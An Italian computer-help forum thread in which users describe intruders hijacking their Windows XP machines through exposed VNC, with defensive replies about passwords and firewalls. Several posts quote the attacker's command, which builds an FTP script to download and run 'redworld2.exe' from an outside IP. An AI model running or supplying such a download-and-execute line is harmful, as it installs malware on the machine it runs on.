www.MegaLab.it

[panzateo]

Ciao a tutti,

Premetto che sono uno smanettone, e che per lavoro ho installato nel computer il no-ip, il vnc (con password), RDP abilitato e non ho firewall .
Come Antivirus uso il kasperski, con anti spyware l'a2suared, e ho xp pro sp2 aggiornato a venerdi scorso.

Ok, ora vi spiego cosa è successo:
ieri pomeriggio mentre la mia morosa era davanti al computer il mouse è partito e gli si è spostato, poi si è aperta la finestra START-->ESEGUI, ed è incominciata a comparire questa stringa:

cmd.exe /c echo open 82.53.83.223 19858>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit

lei era convinta che fossi io collegato da remoto, finche non gli si è aperto il command e non sono tornato a casa. ora ho attivato il firewall di XP, secondo voi che caspita è successo???
Grazie Matteo.

[crazy.cat]

Intanto metterei un firewall vero e non quello di xp.
Qualcuno era entrato, oppure hai un virus nascosto che cercava di uscire.
Bisognerebbe conoscere il significato delle opzioni presenti in quel comando.

[panzateo]

Ok, per il firewall piu buono, ma se apro le porte del vnc il problema si ripresenta???
Per il momento ho disattivato il vnc, e fatto scansioni con av e antispy, senza trovare nulla di anomalo, speriamo bene.

Sapete se per caso il vnc ha delle password di default???

[crazy.cat]

Cambia la password di vnc e metti qualcosa di molto complicato, lettere e numeri insieme.
Non dovrebbe avere password di default, ma non posso confermartelo.

[CerMa]

Ciao, mi sono appena registrato.
Sono interessato alla questione perché anche io ha lo stesso problema.
stringa praticamente identica, a parte il mio IP ovviamente. Se non ho inteso male, il comando apre una connessione FTP con l'esterno, io uso NOD32 e non ho rilevato virus. In comune abbiamo la presenza di VNC attivo.
Il firewall di XP non fa praticamente niente; l'ho configurato in mille modi ma non sono riuscito a risolvere niente. ho anche provato a filtrare bene le porte tramite router ma nada.
Sono dunque arrivato alla conclusione che il soggetto passi attraverso le porte VNC, che sono la 5900 per le conn remote tramite programma e 5800 per le connessioni remote web-based tramite tecnologia Java.
Io per ora ho cambiato la porta di defaul del Java mettendone una a caso e probabilmente chiusa dal mio router. e non stò avendo problemi
Se guardi nella cartella del tuo utente troverai il file eseguibile redworld2 e un file di nome x da 1 byte. Io li ho eliminati manualmente tutte le volte ma non ho risolto niente.
N.B. anche io zero firewall.
Fatemi sapere se si risolve qualcosa, intanto io le tento tutte.
P.S. Ho beccato l'IP di partenza delle connessione, e risulta esseere un IP di Kiev

[buffy2601]

Ciao a tutti, ho letto che non sono il solo ad avere questo problema, anche a me all'improvviso è apparso il comando esegui con la seguente stringa"cmd /c echo OPEN 83.176.xx.19x 7082>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit", insomma x un secondo non ho avuto più il controllo del computer! Ho anche io Vnc e Noip, appena successo ho subito cambiato password su Vnc ma è successo ancora, almeno 3 volte!! Come firewall ho il Sygate 5.5 e antivirus Kaspersky. Qualcuno ha qualche soluzione!! Grazie a tutti in anticipo!!!

[BilloKenobi]

dovrebbe essere una connessione in uscita, quindi il firewall di xp non la blocca (funziona solo in entrata)

non è la prima volta che sento di un computer bucato con vnc... mi piace poco quel programma, se fossi in voi lo userei solo se proprio strettissimamente necessario

ho anche letto di un utonto che lo teneva aperto senza password, e uno l'ha beccato, ma l'ha solo avvisato con un messaggio via notepad

[crazy.cat]

Come firewall ho il Sygate 5.5 e antivirus Kaspersky. Qualcuno ha qualche soluzione!! Grazie a tutti in anticipo!!!

Cambia firewall, sygate è troppo vecchio.
Ne ho disinstallati due ultimamente che erano stati sfondati alla grande ed era passato di tutto.

[asiasolar]

Consiglio di non usare VNC rende il PC vulnerabile se non c'è installato un buon firewall.